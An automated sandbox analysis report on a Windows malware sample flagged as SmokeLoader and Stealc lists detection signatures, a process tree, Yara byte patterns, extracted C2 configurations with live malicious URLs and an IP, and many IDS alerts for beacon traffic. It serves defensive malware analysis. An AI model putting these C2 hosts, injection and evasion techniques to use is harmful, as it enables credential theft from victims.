Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e0OOofAl0S.exe

Overview

General Information

Sample name:e0OOofAl0S.exe
renamed because original name is a hash value
Original sample name:bdaeb131caed57083370b0c24ed030eb.exe
Analysis ID:1502849
MD5:bdaeb131caed57083370b0c24ed030eb
SHA1:c4a00fc122d2015d41c0cf38e00a4711ae05d66d
SHA256:0923186058b76b52069af9fd282af6c98766179cbdd524e4d941e0bf44802781
Tags:exeStealc
Infos:

Detection

CryptOne, SmokeLoader, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected CryptOne packer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • e0OOofAl0S.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\e0OOofAl0S.exe" MD5: BDAEB131CAED57083370B0C24ED030EB)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • D931.exe (PID: 7888 cmdline: C:\Users\user\AppData\Local\Temp\D931.exe MD5: 17D51083CCB2B20074B1DC2CAC5BEA36)
        • svchost015.exe (PID: 7940 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)
  • busaafd (PID: 7708 cmdline: C:\Users\user\AppData\Roaming\busaafd MD5: BDAEB131CAED57083370B0C24ED030EB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
{"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\svchost015.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Local\Temp\svchost015.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x3898:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x3380:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        Click to see the 16 entries
        SourceRuleDescriptionAuthorStrings
        8.0.svchost015.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          8.0.svchost015.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

            System Summary

            barindex
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\busaafd, CommandLine: C:\Users\user\AppData\Roaming\busaafd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\busaafd, NewProcessName: C:\Users\user\AppData\Roaming\busaafd, OriginalFileName: C:\Users\user\AppData\Roaming\busaafd, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\busaafd, ProcessId: 7708, ProcessName: busaafd
            Timestamp:2024-09-02T11:42:46.144858+0200
            SID:2039103
            Severity:1
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:06.074213+0200
            SID:2039103
            Severity:1
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:06.074213+0200
            SID:2851815
            Severity:1
            Source Port:49769
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:35.566947+0200
            SID:2039103
            Severity:1
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:35.566947+0200
            SID:2851815
            Severity:1
            Source Port:49785
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:51.699971+0200
            SID:2039103
            Severity:1
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:51.699971+0200
            SID:2851815
            Severity:1
            Source Port:49761
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:36.818718+0200
            SID:2039103
            Severity:1
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:57.436085+0200
            SID:2039103
            Severity:1
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:46.246051+0200
            SID:2039103
            Severity:1
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:49.853566+0200
            SID:2039103
            Severity:1
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:41.739107+0200
            SID:2039103
            Severity:1
            Source Port:49776
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:44.307397+0200
            SID:2039103
            Severity:1
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:44.307397+0200
            SID:2851815
            Severity:1
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:40.627412+0200
            SID:2039103
            Severity:1
            Source Port:49749
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:53.089075+0200
            SID:2039103
            Severity:1
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:53.089075+0200
            SID:2851815
            Severity:1
            Source Port:49778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:35.445479+0200
            SID:2039103
            Severity:1
            Source Port:49775
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:43.396127+0200
            SID:2039103
            Severity:1
            Source Port:49752
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:20.269684+0200
            SID:2039103
            Severity:1
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:20.269684+0200
            SID:2851815
            Severity:1
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:33.077567+0200
            SID:2039103
            Severity:1
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:34.012823+0200
            SID:2039103
            Severity:1
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:34.012823+0200
            SID:2851815
            Severity:1
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:23.938544+0200
            SID:2039103
            Severity:1
            Source Port:49773
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:47.094815+0200
            SID:2039103
            Severity:1
            Source Port:49756
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:52.757802+0200
            SID:2019714
            Severity:2
            Source Port:49763
            Destination Port:443
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:2024-09-02T11:45:30.435855+0200
            SID:2039103
            Severity:1
            Source Port:49784
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:58.475161+0200
            SID:2039103
            Severity:1
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:07.581354+0200
            SID:2039103
            Severity:1
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:51.472671+0200
            SID:2039103
            Severity:1
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:14.633022+0200
            SID:2039103
            Severity:1
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:40.635665+0200
            SID:2039103
            Severity:1
            Source Port:49786
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:29.123326+0200
            SID:2039103
            Severity:1
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:03.508358+0200
            SID:2039103
            Severity:1
            Source Port:49779
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:34.926361+0200
            SID:2039103
            Severity:1
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:25.102743+0200
            SID:2039103
            Severity:1
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:25.102743+0200
            SID:2851815
            Severity:1
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:39.714288+0200
            SID:2039103
            Severity:1
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:32.133054+0200
            SID:2039103
            Severity:1
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:30.974304+0200
            SID:2039103
            Severity:1
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:30.974304+0200
            SID:2851815
            Severity:1
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:12.999244+0200
            SID:2039103
            Severity:1
            Source Port:49771
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:57.213860+0200
            SID:2039103
            Severity:1
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:29.746264+0200
            SID:2039103
            Severity:1
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:04.318219+0200
            SID:2039103
            Severity:1
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:37.745024+0200
            SID:2039103
            Severity:1
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:37.745024+0200
            SID:2851815
            Severity:1
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:48.937036+0200
            SID:2039103
            Severity:1
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:48.937036+0200
            SID:2851815
            Severity:1
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:50.783382+0200
            SID:2039103
            Severity:1
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:35.855465+0200
            SID:2039103
            Severity:1
            Source Port:49744
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:45.220522+0200
            SID:2039103
            Severity:1
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:30.050148+0200
            SID:2039103
            Severity:1
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:38.679783+0200
            SID:2039103
            Severity:1
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:47.294091+0200
            SID:2039103
            Severity:1
            Source Port:49777
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:48.003225+0200
            SID:2039103
            Severity:1
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:48.003225+0200
            SID:2851815
            Severity:1
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:43:01.253746+0200
            SID:2044243
            Severity:1
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-09-02T11:42:41.556561+0200
            SID:2039103
            Severity:1
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:56.442991+0200
            SID:2039103
            Severity:1
            Source Port:49764
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:42:42.462385+0200
            SID:2039103
            Severity:1
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:45:09.261012+0200
            SID:2039103
            Severity:1
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-09-02T11:44:18.565696+0200
            SID:2039103
            Severity:1
            Source Port:49772
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://91.202.233.158/Avira URL Cloud: Label: malware
            Source: http://91.202.233.158/WAvira URL Cloud: Label: malware
            Source: http://91.202.233.158/e96ea2db21fa9a1b.phpAvira URL Cloud: Label: malware
            Source: http://91.202.233.158Avira URL Cloud: Label: malware
            Source: http://91.202.233.158/e96ea2db21fa9a1b.phpBAvira URL Cloud: Label: malware
            Source: http://91.202.233.158/wsAvira URL Cloud: Label: malware
            Source: http://91.202.233.158/e96ea2db21fa9a1b.phpgAvira URL Cloud: Label: malware
            Source: http://91.202.233.158/e96ea2db21fa9a1b.phpmAvira URL Cloud: Label: malware
            Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}
            Source: 7.2.D931.exe.35b0000.1.raw.unpackMalware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}
            Source: http://91.202.233.158/Virustotal: Detection: 17%Perma Link
            Source: http://91.202.233.158/e96ea2db21fa9a1b.phpVirustotal: Detection: 5%Perma Link
            Source: http://91.202.233.158Virustotal: Detection: 17%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\D931.exeReversingLabs: Detection: 37%
            Source: e0OOofAl0S.exeVirustotal: Detection: 43%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\busaafdJoe Sandbox ML: detected
            Source: e0OOofAl0S.exeJoe Sandbox ML: detected
            Source: e0OOofAl0S.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\e0OOofAl0S.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 191.96.144.157:443 -> 192.168.2.4:49763 version: TLS 1.2

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49742 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49758 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49757 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49746 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49739 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49753 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49761 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49777 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49786 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49784 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49783 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49776 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49769 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49778 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49775 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49767 -> 91.202.233.158:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49782 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49779 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.4:49782 -> 102.189.104.201:80
            Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49788 -> 102.189.104.201:80
